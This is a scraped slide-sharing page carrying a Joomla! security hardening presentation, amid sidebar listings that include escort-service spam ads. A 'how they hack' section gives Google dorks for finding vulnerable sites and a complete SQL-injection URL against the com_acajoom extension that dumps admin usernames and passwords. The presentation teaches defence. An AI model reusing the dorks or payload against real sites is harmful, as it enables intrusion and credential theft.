The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 

Dernier (20)

Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 

Joomla! Security Checklist for Websites

  • 1. By Shaiffulnizam Mohamad JOOMLA! SECURITY ...Security is a moving target, so today's expert might be tomorrow's victim...
  • 3. Definition of “Hacker” • Someone who deliberately seeks to bypass a server’s security • Black, grey, white hats • A hacked site is a broken/compromised site • A skilled computer programmer • A hacked site is a tweaked and improved site • A script kiddie • Junior hacker using other hacker’s tools and techniques
  • 4. Hacking Motives? • To see if they can • To create mayhem • For social standing in the sub-culture • For political reasons – hacktivism • For financial reasons • Theft – steal ebooks, videos, games, online services etc • Sell data – user profiles, credit card details etc • Industrial sabotage - paid to break competitor sites • Set up zombie farms • Steal bandwidth • Host phishing pages • Collect passwords
  • 5. How do we know that we’ve been hacked? • Site trashed • Hacking message • High bandwidth use • Changed admin password • New user with admin rights • Server logs
  • 6. Why do we care about computer security?
  • 7. No ONE is SAFE!Type of site Motivation Any site To see if they can To create mayhem Social standing Post political messages Zombie farms Steal bandwidth Host phishing pages Any membership site Sell user profiles to marketers Obtain usernames and passwords Some ecommerce sites Sell credit card details to thieves Sell order history and contact details to marketers
  • 8. Why worry about being hacked? • Sites are targeted at random • Hacking is actually quite easy • Vulnerable sites are easy to find • Vulnerable sites are easy to hack • Fixing hacked sites is quite tricky • Hacks can be invisible • Clients may not notice a hacked site for some time • Finding a clean backup may be impossible • Determining what has been done can be really hard • May be difficult to restore • Hardening site to avoid future hacks requires skill and focus
  • 9. Why worry about being hacked? Hacked sites are a big problem • Business reputation • Angry clients • Site shutdown by host • Loss of business • Data theft
  • 11. Is Joomla! Sites easy to hack?• Yes and No • Joomla has to strike a balance between security and ease of use • Joomla an attractive target for hackers • The critical mass of sites • Large amateur web developer user base • Extensions have variable security • The site must be vulnerable
  • 12. How do they hack? 1. Find a vulnerability (and instructions on how to exploit it) 2. Find a vulnerable site 3. Hack the site
  • 13. 1st Finding vulnerability • Security sites • www.exploit-db.com, www.secunia.com • Various hacking sites/forums • Joomla vulnerable extensions list • docs.joomla.org/Vulnerable_Extensions_List
  • 14. 2nd find a vulnerable sites• Google Dork - a search phrase to find vulnerable sites • PHPInfo • intitle:phpinfo() • Vulnerable extensions • allinurl:com_acajoom
  • 15. 3rd cut n paste code! http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom &act=mailing&task=view&listid=1&Itemid=1&mailingid=1/* */union/**/select/**/1,1,1,1,concat(username,0x3a,passw ord),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/* */LIMIT/**/1,1/*
  • 16. Sometimes… RFI = Remote file inclusions Executing SHELL Files and taking control of the Server
  • 17. What should we do to prevent? • Server operating system • Server Software • PHP + MySQL  Joomla  Extensions  Users and their behaviour Joomla! Security Involves
  • 18. What should we do to prevent? 1. Updating Your Server Operating System 2. Update your Server Software e.g. Apache, Nginx, IIS, Litespeed etc 3. Update Your PHP & MySQL Server 4. Secure Your Server Security Action plan
  • 19. [1] Basic actions [2] More complex actions [3] Actions that require significant modification rights on the server (unless already implemented by default) Image by echiner1 What should we do to prevent?
  • 20. Joomla! Security Server ~ shared, VPS and Dedicated • A shared server • Your site(s) live in the same hosting space as other sites that you do not administer • This is the cheapest hosting option. • No say over the security of the other sites on the server • Old shared server is the worst location for your hosting • A Virtual Private Server • Better than shared • Still can’t change many settings
  • 21. Joomla! Security Server ~ shared, VPS and Dedicated • A dedicated server • Allow you to upgrade and tweak all the settings on a dedicated server • Host retains responsibility for maintenance
  • 22. Joomla! Security Server ~ Security 1. The underlying Operating System must be updated 2. Updating the Webserver e.g. Apache, Nginx etc 3. Updating the PHP and MySQL 4. Securing the Above 5. Installing additional Security layers
  • 23. Joomla! Security Server ~ Security Hardening 1. Securing Apache Webserver Adding web headers to block XSS etc. <IfModule mod_headers.c> Header set X-XSS-Protection: "1; mode=block" Header set X-Content-Security-Policy: "allow 'self'; options inline-script; img$ Header set Strict-Transport-Security: "max-age=43200; includeSubDomains" Header set Cache-Control: "max-age=3600, public, must-revalidate" Header set X-frame-options: "deny" Header set X-Content-Type-Options: "nosniff" #Header set X-Content-Security-Policy: "default-src 'self'" Header unset X-Powered-By Header unset X-Pingback </IfModule> 2. Hide Server Signature
  • 24. Joomla! Security Server ~ Security Hardening 3. Activating .htaccess override in Apache conf • .htaccess files • [1] Activate the htaccess file in the Joomla root • [1] Use an .htpasswd for the /administrator/ folder • [3] Advanced .htaccess files
  • 25. Joomla! Security Server ~ Security Hardening 1. Hardening PHP with SUHOSIN 2. Use PHP Disable function show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open 3. Do not expose PHP Version expose_php = off 4. Use open_basedir (restriction file handling functions)
  • 26. Joomla! Security Server ~ Security Hardening • Globally reset all files • Owner – AccountUsername:AccountUsername chown -R user:group * • Files – 644 find . -type f -exec chmod 644 {} ; • Folders – 755 find . -type d -exec chmod 755 {} ; Use suPHP PHP files are run under the user of the website instead of the Apache user
  • 27. Joomla! Security Server ~ Security Hardening 1. Hardening MySQL server 2. Disable access from outside (allow local connections) 3. Make sure using Password or after setup, run mysql_secure_installation command
  • 28. Joomla! Security Server ~ Additional Security Hardening 1. Add additional firewall e.g. CSF firewall 2. Add modsecurity firewall ~ apache module that helps to protect your website from various attacks. It is used to block commonly known exploits by use of regular expressions and rule sets 3. Install Malware detector such as maldet 4. Install rootkit detector 5. Install fail2ban / IDS (intrusion detector)
  • 29. Joomla! Security Use CDN for security 1. Prevent DDOS 2. Stop Hackers 3. Secure website from attack
  • 30. Joomla! Security Use CDN for security 1. Prevent DDOS 2. Stop Hackers 3. Secure website from attack
  • 31. Joomla! Security Use CDN for security
  • 32. Joomla! Security Use CDN for security
  • 34. Upgrade to the latest stable version of Joomla! as soon as possible. Download Joomla! from official sites only, such as JoomlaCode.org, and check the MD5 hash. Use Web Page Diagnostic Tools, i.e. Firefox Firebug, IE Web Developer Toolbar, Opera Dragonfly, etc. to ensure that all files were installed correctly. Joomla! Security Checklisthttps://docs.joomla.org/Security Install official versions of Joomla! http://www.joomla.org/download.html Install official Updates from Joomla! To avoid breaking your site, search the forums for reports of incompatible extensions before upgrading to a new version of Joomla.
  • 35. Joomla! Security Checklisthttps://docs.joomla.org/Security Default administrator username Change the user name of the default admin user. This simple step effectively increases the security of this critical account 50% by modifying one of the two variables attackers must know to gain access. Never use easy to guess passwords, avoid at no cost. e.g. admin123, passwords, 123456 Use mix characters (upper and lower case) with special characters. e.g F1$hn3Tw0Rk, use more than 8 digits Administrator passwords
  • 36. Joomla! Security Checklisthttps://docs.joomla.org/Security Limit superadmin Less superadmin, mean less problem Disable registration, if you are not running social sites, or if your website is limited to your employee If you are not running Social site, disable registration
  • 37. Joomla! Security Checklisthttps://docs.joomla.org/Security Protecting directories and files All configurable path must be rewritable Must never use chmod 777, chmod 755 is sufficient for directories and 644 for files. Use .htaccess to disable directories such as images and download from running php files. # secure directory by disabling script execution AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi Options -ExecCGI
  • 38. Joomla! Security Checklisthttps://docs.joomla.org/Security Remove all unneeded files and extensions All unneeded and unused files and extensions must be remove In general, do not leave any unneeded files (compressed or otherwise) on a public server. Each unused (and perhaps long forgotten) file is a potential security hole.
  • 39. Joomla! Security Checklisthttps://docs.joomla.org/Security Installing Joomla! Extensions 1. Always backup 2. Check for extension vulnerabilities 3. Download from trusted site 4. Check code quality of the extensions 5. Test on development site 6. Remove junk 7. Avoid encrypted code
  • 40. Joomla! SecurityHow to secure Joomla! [1] SEF all URLs [2] Clear the default Joomla metatags [3] Clear the default Home page title [4] Remove generator tag [5] Change favicon [6] Hide component credits Less information provided about Joomla!, means much difficult to attack
  • 41. Joomla! SecurityHow to secure Joomla! Two-Factor Authentication is a login method whereby a person has to provide his/her user name, password and a random generated OTP (One Time Password). OTP is six numeric digit code, generated by cryptographic functions in a short interval. Even if a hacker was to guess your Joomla Administrator username and password correctly, they would still require the OTP to login. To enabled Two-Factor Authentication requires Joomla 3.2.0 or higher. 1.Login into the Administration area. 2.Click on Components >> Post-installation Messages. 3.Click on Enable two-factor authentication. 4.Install a Google Authenticator compatible client for your device. Implement 2 factor Authentication
  • 42. Joomla! SecurityHow to secure Joomla! Trying to inject spam content onto your site Targets Joomla core forms and extension forms Use captcha to fight against automated spammers
  • 43. Joomla! SecurityHow to secure Joomla! Use security extensions
  • 44. Joomla! SecurityHow to secure Joomla! Disable FTP access from Joomla! • If a hacker can obtain your FTP password, they can login as you, bypassing almost every security barrier. • FTP passwords are stored unencrypted in your FTP program! • FTP authentication details pass unencrypted to the server! • There are several common FTP apps that store their passwords in a standard location with a standard name!
  • 45. Joomla! SecurityHow to secure Joomla! Change temporary folder and logs path
  • 46. Joomla! SecurityHow to secure Joomla! Make sure to check for Joomla!/extensions Update
  • 47. Joomla! SecurityHow to secure Joomla! Preparing for the Worst Are you ready?
  • 48. Joomla! SecurityHow to secure Joomla! Preparing for the Worst 1. Site monitoring 2. Joomla site backups 3. Restoring a hacked site
  • 49. Joomla! Security Site monitoring • Diagnostics • Site down • Home page content changes • Mod_security logs (shows attempts) • Bandwidth use • Spam blacklisting • [3] Searching and browsing server logs
  • 50. Joomla! Security Joomla! Backup • Why backup? • When should I backup my Joomla! site? • How often should I backup my Joomla! site? • How to backup?
  • 51. Joomla! Security Joomla! Backup How to backup? 1. Manual backup through command line. (database) 2. Using extensions such as Akeeba Backup, EJB and XCloner What to backup? 1. All files 2. Images or docs REMEMBER TO TEST YOUR BACKUP
  • 52. • Fixes the obvious problems • Does not address: • Hidden hacks • Shell scripts • Backdoors • Zombies • Continuing vulnerabilities • Impacts of data exposure Photo: flickr.com/photos/andreweason Joomla! Security
  • 53. The End Shaiffulnizam Mohamad OWASP Members since 2010 Involved in all Joomla Day Malaysia since 2007 Specializing in Joomla! And Security. shaifful.md@gmail.com / 0129531452 Joomla! Security